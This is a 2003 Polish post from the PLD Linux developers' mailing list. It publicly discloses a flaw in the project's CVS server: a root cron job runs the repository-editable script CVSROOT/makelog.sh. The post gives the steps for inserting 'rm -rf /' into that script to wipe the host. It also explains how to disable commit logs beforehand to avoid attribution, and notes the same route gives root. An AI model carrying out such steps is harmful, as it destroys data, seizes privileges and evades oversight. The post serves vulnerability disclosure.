cvs

Arkadiusz Miskiewicz arekm w pld-linux.org
Pon, 2 Cze 2003, 14:48:15 CEST


On/Dnia Mon, Jun 02, 2003 at 01:18:41PM +0200, Andrzej Krzysztofowicz wrote/napisał(a)
> Widze, ze w cvs.pld-linux.org nie sa generowane changelogi.
> Stan przejsciowy, czy trwaly ?

Chyba nikt skryptu nie poprawił, a na cvs.pld.org.pl jest obecnie tak
(tydzień minął bez zainteresowania więc można upublicznić):

To: pld-security-team w pld.org.pl
Subject: Dziurki w cvsie pld =?iso-8859-2?Q?=28zres?=
	=?iso-8859-2?B?enSx?= znane od dawien dawna)

Przepis na skasowanie całego CVSu PLD, a może nawet całego hosta na którym
działa cvs:

cvs co CVSROOT
vi CVSROOT/makelog.sh
dopisujemy na początku rm -rf /
commitujemy
czekamy maksymalnie 1h

Skrypt makelog.sh pracuje z crona z roota.

Wada (a równocześnie zaleta): wiadomo kto napsuł (ale tu wystarczy
wyłączyć commit logi dla CVSROOT i dopiero wtedy wykonać powyższe
- z logów się nic nie odczyta bo logi pójdą do piachu po rm -rf,
a zbackupować się nie zdążą, jedyną oznaką jest ów commit log
wyłączający commity dla CVSROOT).

Tym samym sposobem można uzyskać roota na w/w hoście o ile nie ma
chroota.

Dziurka jest znana od wieków (choć nigdy nie wykorzystywana).

>   Andrzej M. Krzysztofowicz               ankry w mif.pg.gda.pl

ps. generalnie powyższe zależy od konfiguracji cvsa i jest tylko teorią.

-- 
Arkadiusz Miśkiewicz    CS at FoE, Wroclaw University of Technology
arekm w sse.pl   AM2-6BONE, 1024/3DB19BBD, arekm(at)ircnet, PLD/Linux



Więcej informacji o liście dyskusyjnej pld-devel-pl